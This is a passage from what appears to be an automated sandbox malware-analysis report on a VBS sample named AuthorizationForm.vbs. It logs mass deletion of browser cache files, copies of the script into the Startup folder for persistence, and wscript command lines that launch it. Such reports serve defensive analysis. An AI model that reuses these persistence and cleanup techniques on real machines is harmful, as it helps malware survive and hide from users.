C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\analytics[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\ast[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\BB1kvzy[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\BBDk44m[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\BBnYSFZ[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\bs-jsdep[1].css
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\btn-google-play.d100575afc96[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\core[1].css
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\firefox_new_scene2-bundle.2864989fccc1[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\geo2[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\icon-alert.90f18723c41a[1].svg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\icon-sprite.6e9f0f71a7fe[1].svg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\latest[1].eot
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\latest[2].eot
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\latest[3].eot
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\latest[4].eot
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\stub-attribution-bundle.6f2d0cdf7104[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\trans[1].gif
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\1715500327[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\4300ae64-546c-4bbe-9026-6779b3684fb8_32[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\accordion_icon_sprite[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\bxslider[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\core[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\FRE-background-v2[1].jpg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\FRE-check-green[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\gl_site[1].svg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\jquery-1.9.1.min[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\modal[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTINEP1R\selectBox[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet 
Files\Low\Content.IE5\RTINEP1R\string[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RTI success or wait 1 6F309346 DeleteFileW NEP1R\take_make_rocks_1000X463[1].jpg C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\FRE-IE[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\FRE-repair-FPO[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\FRE-Windows[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\getadobecom[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\jquery-1.7.1.min[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\jquery-1.8.3.min[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\jquery-ui.min[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\outside[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\polarbear[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\script[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\style[1].css success or wait 1 6F309346 DeleteFileW

Copyright Joe Security LLC 2018 Page 24 of 30 Source File Path Completion Count Address Symbol C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\S16GFFIQ\yoe7ink[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\background[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\FRE-AV[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\latest[1].eot success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\logo[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\ms[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\pdc_s_code[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\principallogomicrosoft[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\p[1].gif success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\satelliteLib-7123a14bc11 success or wait 1 6F309346 DeleteFileW ffd1ad43be190a593a8932494dcb0[1].js C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\swfobject[1].js success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\V8RO3I6X\yoe7ink-d[1].css success or wait 1 6F309346 DeleteFileW 
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\17k[1].gif success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\AA3e1pt[1].png success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\AApAF80[1].jpg success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\b2fd15[1].eot success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\bs-util[1].css success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\btn-google-play.77bdbc93 success or wait 1 6F309346 DeleteFileW 5c58[1].png C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\desktop.ini success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\DevCMDL2.2.18[1].eot success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\e151e5[1].gif success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\firefox_new_onboarding_s success or wait 1 6F309346 DeleteFileW cene1-bundle.9ac26ce2017d[1].css C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\firefox_new_onboarding_s success or wait 1 6F309346 DeleteFileW cene2-bundle.5329da405b3b[1].css C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\horizon-night.53e7d3475f success or wait 1 6F309346 DeleteFileW d0[1].svg C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet 
Files\Low\Content.IE5\WYECI2WS\mailbox.0b8d509e594e[1]. success or wait 1 6F309346 DeleteFileW png C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\new[1].htm success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\new[2].htm success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\oldIE-bundle.889624ae22e success or wait 1 6F309346 DeleteFileW 6[1].css C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\Passport[1].htm success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\print[1].txt success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYE success or wait 1 6F309346 DeleteFileW CI2WS\sft_pagetype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE12;kvgrp=104272687;kvismo b=2;extmirroring=0;kvtile=1;target=_blank;aduho=120;grp=104272687[1] C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYE success or wait 1 6F309346 DeleteFileW CI2WS\sft_pagetype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=104272687;kvismo b=2;extmirroring=0;kvtile=3;target=_blank;aduho=120;grp=104272687[1] C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYE success or wait 1 6F309346 DeleteFileW CI2WS\sft_pagetype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1C;kvgrp=104272687;kvismo b=2;extmirroring=0;kvtile=4;target=_blank;aduho=120;grp=104272687[1] C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYE success or wait 1 6F309346 DeleteFileW CI2WS\sft_pagetype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1D;kvgrp=104272687;kvismo 
b=2;extmirroring=0;kvtile=5;target=_blank;aduho=120;grp=104272687[1] C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\social-icon-sprite.bf2ae success or wait 1 6F309346 DeleteFileW 0cd0f01[1].svg C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\stub_attribution_code[1] success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WYECI2WS\th[1].jpg success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.ini success or wait 1 6F309346 DeleteFileW C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\MSIMGSIZ.DAT success or wait 1 6F309346 DeleteFileW

File Written

Source File Path | Offset | Length | Value | Ascii | Completion | Count | Address | Symbol

Source File Path: C:\Users\user\AppData\Roaming\AuthorizationForm.vbs
Offset: 0
Length: 65536
Value: 27 27 6d 52 7a 6a 4d 75 76 51 49 59 47 49 55 7a 77 5a 69 6c 45 44 67 65 6a 66 54 76 41 44 7a 76 4d 6d 78 6a 4f 6b 77 6d 4b 47 44 78 76 6c 52 68 54 51 68 6c 69 53 54 75 67 79 66 53 54 46 75 55 65 79 55 76 76 53 47 67 48 48 51 78 4d 54 54 4b 49 51 47 54 79 6a 68 78 49 45 45 77 76 4f 4f 52 51 4f 53 4b 54 4c 49 67 48 5a 46 51 41 45 76 78 4b 68 55 68 4c 47 75 47 6c 75 53 52 0d 0a 27 6d 52 7a 6a 4d 75 76 51 49 59 47 49 55 7a 77 5a 69 6c 45 44 67 65 6a 66 54 76 41 44 7a 76 4d 6d 78 6a 4f 6b 77 6d 4b 47 44 78 76 6c 52 68 54 51 68 6c 69 53 54 75 67 79 66 53 54 46 75 55 65 79 55 76 76 53 47 67 48 48 51 78 4d 54 54 4b 49 51 47 54 79 6a 68 78 49 45 45 77 76 4f 4f 52 51 4f 53 4b 54 4c 49 67 48 5a 46 51 41 45 76 78 4b 68 55 68 4c 47 75 47 6c 75 53 52 0d 0a 27 6d 52 7a
Ascii: ''mRzjMuvQIYGIUzwZilEDgejfTvADzvMmxjOkwmKGDxvlRhTQhliSTugyfSTFuUeyUvvSGgHHQxMTTKIQGTyjhxIEEwvOORQOSKTLIgHZFQAEvxKhUhLGuGluSR..'mRzjMuvQIYGIUzwZilEDgejfTvADzvMmxjOkwmKGDxvlRhTQhliSTugyfSTFuUeyUvvSGgHHQxMTTKIQGTyjhxIEEwvOORQOSKTLIgHZFQAEvxKhUhLGuGluSR..'mRz
Completion: success or wait
Count: 5
Address: 6F309434
Symbol: CopyFileW

Source File Path: C:\Users\user\AppData\Roaming\AuthorizationForm.vbs:Zone.Identifier
Offset: 0
Length: 26
Value: 5b 5a 6f 6e 65 54 72 61 6e 73 66 65 72 5d 0d 0a 0d 0a 5a 6f 6e 65 49 64 3d 30
Ascii: [ZoneTransfer]....ZoneId=0
Completion: success or wait
Count: 1
Address: 6F309434
Symbol: CopyFileW

Source File Path: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuthorizationForm.vbs
Offset: 0
Length: 65536
Value: 27 27 6d 52 7a 6a 4d 75 76 51 49 59 47 49 55 7a 77 5a 69 6c 45 44 67 65 6a 66 54 76 41 44 7a 76 4d 6d 78 6a 4f 6b 77 6d 4b 47 44 78 76 6c 52 68 54 51 68 6c 69 53 54 75 67 79 66 53 54 46 75 55 65 79 55 76 76 53 47 67 48 48 51 78 4d 54 54 4b 49 51 47 54 79 6a 68 78 49 45 45 77 76 4f 4f 52 51 4f 53 4b 54 4c 49 67 48 5a 46 51 41 45 76 78 4b 68 55 68 4c 47 75 47 6c 75 53 52 0d 0a 27 6d 52 7a 6a 4d 75 76 51 49 59 47 49 55 7a 77 5a 69 6c 45 44 67 65 6a 66 54 76 41 44 7a 76 4d 6d 78 6a 4f 6b 77 6d 4b 47 44 78 76 6c 52 68 54 51 68 6c 69 53 54 75 67 79 66 53 54 46 75 55 65 79 55 76 76 53 47 67 48 48 51 78 4d 54 54 4b 49 51 47 54 79 6a 68 78 49 45 45 77 76 4f 4f 52 51 4f 53 4b 54 4c 49 67 48 5a 46 51 41 45 76 78 4b 68 55 68 4c 47 75 47 6c 75 53 52 0d 0a 27 6d 52 7a
Ascii: ''mRzjMuvQIYGIUzwZilEDgejfTvADzvMmxjOkwmKGDxvlRhTQhliSTugyfSTFuUeyUvvSGgHHQxMTTKIQGTyjhxIEEwvOORQOSKTLIgHZFQAEvxKhUhLGuGluSR..'mRzjMuvQIYGIUzwZilEDgejfTvADzvMmxjOkwmKGDxvlRhTQhliSTugyfSTFuUeyUvvSGgHHQxMTTKIQGTyjhxIEEwvOORQOSKTLIgHZFQAEvxKhUhLGuGluSR..'mRz
Completion: success or wait
Count: 5
Address: 6F309434
Symbol: CopyFileW

Source File Path: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuthorizationForm.vbs:Zone.Identifier
Offset: 0
Length: 26
Value: 5b 5a 6f 6e 65 54 72 61 6e 73 66 65 72 5d 0d 0a 0d 0a 5a 6f 6e 65 49 64 3d 30
Ascii: [ZoneTransfer]....ZoneId=0
Completion: success or wait
Count: 1
Address: 6F309434
Symbol: CopyFileW

Registry Activities

Source Key Path Completion Count Address Symbol

Source Key Path Name Type Data Completion Count Address Symbol

Source Key Path Name Type Old Data New Data Completion Count Address Symbol

Analysis Process: explorer.exe PID: 3188 Parent PID: 2812

General

Start time: 20:26:18
Start date: 17/01/2018
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: explorer.exe wscript.exe //B 'C:\Users\user\AppData\Roaming\AuthorizationForm.vbs'
Imagebase: 0x774a0000
File size: 2972672 bytes
MD5 hash: 6DDCA324434FFA506CF7DC4E51DB7935
Programmed in: C, C++ or other language
Reputation: high

File Activities

File Created

Source File Path | Access | Attributes | Options | Completion | Count | Address | Symbol

Source File Path: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
Access: read data or list directory and synchronize
Attributes: normal
Options: directory file and synchronous io non alert and open for backup ident and open reparse point
Completion: object name collision
Count: 1
Address: 12D76F
Symbol: ILCreateFromPathW

Analysis Process: explorer.exe PID: 3200 Parent PID: 2812

General

Start time: 20:26:18
Start date: 17/01/2018
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: explorer.exe wscript.exe //B 'C:\Users\user\AppData\Roaming\AuthorizationForm.vbs'
Imagebase: 0x74190000
File size: 2972672 bytes
MD5 hash: 6DDCA324434FFA506CF7DC4E51DB7935
Programmed in: C, C++ or other language
Reputation: high

File Activities

File Created

Source File Path | Access | Attributes | Options | Completion | Count | Address | Symbol

Source File Path: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
Access: read data or list directory and synchronize
Attributes: normal
Options: directory file and synchronous io non alert and open for backup ident and open reparse point
Completion: object name collision
Count: 1
Address: 12D76F
Symbol: ILCreateFromPathW

Analysis Process: explorer.exe PID: 3224 Parent PID: 548

General

Start time: 20:26:18
Start date: 17/01/2018
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase: 0x75b60000
File size: 2972672 bytes
MD5 hash: 6DDCA324434FFA506CF7DC4E51DB7935
Programmed in: C, C++ or other language
Reputation: high

File Activities

Source File Path Access Attributes Options Completion Count Address Symbol

Source File Path Offset Length Value Ascii Completion Count Address Symbol

Registry Activities

Source Key Path Completion Count Address Symbol

Source Key Path Name Type Data Completion Count Address Symbol

Source Key Path Name Type Old Data New Data Completion Count Address Symbol

Analysis Process: explorer.exe PID: 3236 Parent PID: 2812

General

Start time: 20:26:18
Start date: 17/01/2018
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuthorizationForm.vbs
Imagebase: 0x75310000
File size: 2972672 bytes
MD5 hash: 6DDCA324434FFA506CF7DC4E51DB7935
Programmed in: C, C++ or other language
Reputation: high

File Activities

File Created

Source File Path | Access | Attributes | Options | Completion | Count | Address | Symbol

Source File Path: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
Access: read data or list directory and synchronize
Attributes: normal
Options: directory file and synchronous io non alert and open for backup ident and open reparse point
Completion: object name collision
Count: 1
Address: 12D728
Symbol: ILCreateFromPathW

Analysis Process: explorer.exe PID: 3300 Parent PID: 548

General

Start time: 20:26:19
Start date: 17/01/2018
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase: 0x774a0000
File size: 2972672 bytes
MD5 hash: 6DDCA324434FFA506CF7DC4E51DB7935
Programmed in: C, C++ or other language
Reputation: high

File Activities

Source File Path Access Attributes Options Completion Count Address Symbol

Source File Path Offset Length Value Ascii Completion Count Address Symbol

Analysis Process: explorer.exe PID: 3344 Parent PID: 548

General

Start time: 20:26:21
Start date: 17/01/2018
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase: 0x755c0000
File size: 2972672 bytes
MD5 hash: 6DDCA324434FFA506CF7DC4E51DB7935
Programmed in: C, C++ or other language
Reputation: high

Registry Activities

Source Key Path Completion Count Address Symbol

Source Key Path Name Type Data Completion Count Address Symbol

Analysis Process: wscript.exe PID: 3472 Parent PID: 3344

General

Start time: 20:26:24
Start date: 17/01/2018
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuthorizationForm.vbs'
Imagebase: 0x774a0000
File size: 141824 bytes
MD5 hash: 979D74799EA6C8B8167869A68DF5204A
Programmed in: C, C++ or other language
Reputation: moderate

File Activities

Source File Path Access Attributes Options Completion Count Address Symbol

Disassembly

Code Analysis
